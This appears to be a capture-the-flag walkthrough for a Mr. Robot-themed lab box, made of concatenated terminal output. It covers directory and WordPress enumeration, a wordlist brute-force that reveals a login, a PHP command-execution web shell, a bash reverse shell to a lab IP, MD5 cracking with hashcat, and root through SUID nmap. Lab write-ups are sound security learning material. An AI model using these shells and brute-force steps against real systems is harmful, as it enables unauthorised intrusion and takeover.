└─$ gobuster dir -u http://10.10.165.114/ -w /usr/share/wordlists/dirb/common.txt | tee gobuster.out
Last updated
$ gobuster dir -u http://10.10.79.200/ -w /usr/share/wordlists/dirb/common.txt | tee gobuster.out
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.79.200/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/05/21 11:27:31 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 213]
/.htaccess (Status: 403) [Size: 218]
/.htpasswd (Status: 403) [Size: 218]
/0 (Status: 301) [Size: 0] [--> http://10.10.79.200/0/]
/admin (Status: 301) [Size: 234] [--> http://10.10.79.200/admin/]
/atom (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/atom/]
/audio (Status: 301) [Size: 234] [--> http://10.10.79.200/audio/]
/blog (Status: 301) [Size: 233] [--> http://10.10.79.200/blog/]
/css (Status: 301) [Size: 232] [--> http://10.10.79.200/css/]
/dashboard (Status: 302) [Size: 0] [--> http://10.10.79.200/wp-admin/]
/favicon.ico (Status: 200) [Size: 0]
/feed (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/]
/images (Status: 301) [Size: 235] [--> http://10.10.79.200/images/]
/Image (Status: 301) [Size: 0] [--> http://10.10.79.200/Image/]
/image (Status: 301) [Size: 0] [--> http://10.10.79.200/image/]
/index.html (Status: 200) [Size: 1188]
/index.php (Status: 301) [Size: 0] [--> http://10.10.79.200/]
/intro (Status: 200) [Size: 516314]
/js (Status: 301) [Size: 231] [--> http://10.10.79.200/js/]
/license (Status: 200) [Size: 309]
/login (Status: 302) [Size: 0] [--> http://10.10.79.200/wp-login.php]
/page1 (Status: 301) [Size: 0] [--> http://10.10.79.200/]
/phpmyadmin (Status: 403) [Size: 94]
/readme (Status: 200) [Size: 64]
/rdf (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/rdf/]
/robots (Status: 200) [Size: 41]
/robots.txt (Status: 200) [Size: 41]
/rss (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/]
/rss2 (Status: 301) [Size: 0] [--> http://10.10.79.200/feed/]
/sitemap (Status: 200) [Size: 0]
/sitemap.xml (Status: 200) [Size: 0]
/video (Status: 301) [Size: 234] [--> http://10.10.79.200/video/]
/wp-admin (Status: 301) [Size: 237] [--> http://10.10.79.200/wp-admin/]
/wp-content (Status: 301) [Size: 239] [--> http://10.10.79.200/wp-content/]
/wp-config (Status: 200) [Size: 0]
/wp-includes (Status: 301) [Size: 240] [--> http://10.10.79.200/wp-includes/]
/wp-cron (Status: 200) [Size: 0]
/wp-links-opml (Status: 200) [Size: 227]
/wp-load (Status: 200) [Size: 0]
/wp-login (Status: 200) [Size: 2606]
/wp-mail (Status: 500) [Size: 3064]
/wp-settings (Status: 500) [Size: 0]
/wp-signup (Status: 302) [Size: 0] [--> http://10.10.79.200/wp-login.php?action=register]
/xmlrpc (Status: 405) [Size: 42]
/xmlrpc.php (Status: 405) [Size: 42] User-agent: *
fsocity.dic
key-1-of-3.txt$ curl http://10.10.79.200/key-1-of-3.txt -o key1.txt
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 33 100 33 0 0 95 0 --:--:-- --:--:-- --:--:-- 95
$ cat key1.txt
REDACTEDwpscan --url http://10.10.166.52/ -v -o wpscan-verbose$ cat wpscan-verbose
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.17
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.79.200/ [10.10.79.200]
[+] Started: Fri May 21 11:55:02 2021
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache
| - X-Mod-Pagespeed: 1.9.32.3-4523
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://10.10.79.200/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.79.200/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] The external WP-Cron seems to be enabled: http://10.10.79.200/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.79.200/0bdcad3.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.79.200/0bdcad3.html, Match: 'WordPress 4.3.1'
[+] WordPress theme in use: twentyfifteen
| Location: http://10.10.79.200/wp-content/themes/twentyfifteen/
| Last Updated: 2021-03-09T00:00:00.000Z
| Readme: http://10.10.79.200/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 2.9
| Style URL: http://10.10.79.200/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, straightforward typography is readable on a wide variety of screen sizes, and suitable for multiple languages. We designed it using a mobile-first approach, meaning your content takes center-stage, regardless of whether your visitors arrive by smartphone, tablet, laptop, or desktop computer.
| Author: the WordPress team
| Author URI: https://wordpress.org/
| License: GNU General Public License v2 or later
| License URI: http://www.gnu.org/licenses/gpl-2.0.html
| Tags: black, blue, gray, pink, purple, white, yellow, dark, light, two-columns, left-sidebar, fixed-layout, responsive-layout, accessibility-ready, custom-background, custom-colors, custom-header, custom-menu, editor-style, featured-images, microformats, post-formats, rtl-language-support, sticky-post, threaded-comments, translation-ready
| Text Domain: twentyfifteen
|
| Found By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.79.200/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'
[i] No plugins Found.
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri May 21 11:57:46 2021
[+] Requests Done: 140
[+] Cached Requests: 39
[+] Data Sent: 34.919 KB
[+] Data Received: 53.111 KB
[+] Memory used: 204.859 MB
[+] Elapsed time: 00:02:43$ wget 10.10.79.200/fsocity.dic
--2021-05-21 12:00:07-- http://10.10.79.200/fsocity.dic
Connecting to 10.10.79.200:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘fsocity.dic’
fsocity.dic 100%[=============================================================>] 6.91M 752KB/s in 16s
2021-05-21 12:00:23 (445 KB/s) - ‘fsocity.dic’ saved [7245381/7245381]$ wc -l fsocity.dic
858160 fsocity.dic
$ sort -u fsocity.dic > uniq-fscoity.dic
$ wc -l uniq-fscoity.dic
11451 uniq-fscoity.dic┌──(docker㉿docker)-[~/HackBox]
└─$ wpscan --url http://10.10.166.52 -t 50 -U Elliot -P uniq-fscoity.dic
[!] Valid Combinations Found:
| Username: Elliot, Password: ER28-0652
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Dec 28 16:34:01 2024
[+] Requests Done: 184
[+] Cached Requests: 6
[+] Data Sent: 1.233 MB
[+] Data Received: 1.189 MB
[+] Memory used: 303.211 MB
[+] Elapsed time: 00:01:29
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html><?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.3.237/1234 0>&1'");
?>c3fcd3d76192e4007dfb496cca67e13b┌──(docker㉿docker)-[~/HackBox]
└─$ hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txtrobot@linux:/$ sudo -l
[sudo] password for robot:
Sorry, user robot may not run sudo on linux.[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
.
.
-rwsr-xr-x 1 root root 493K Nov 13 2015 /usr/local/bin/nmaprobot@linux:~$ nmap --interactive
nmap> !sh
# ls
ls
key-2-of-3.txt password.raw-md5
# cat key-2-of-3.txt
cat key-2-of-3.txt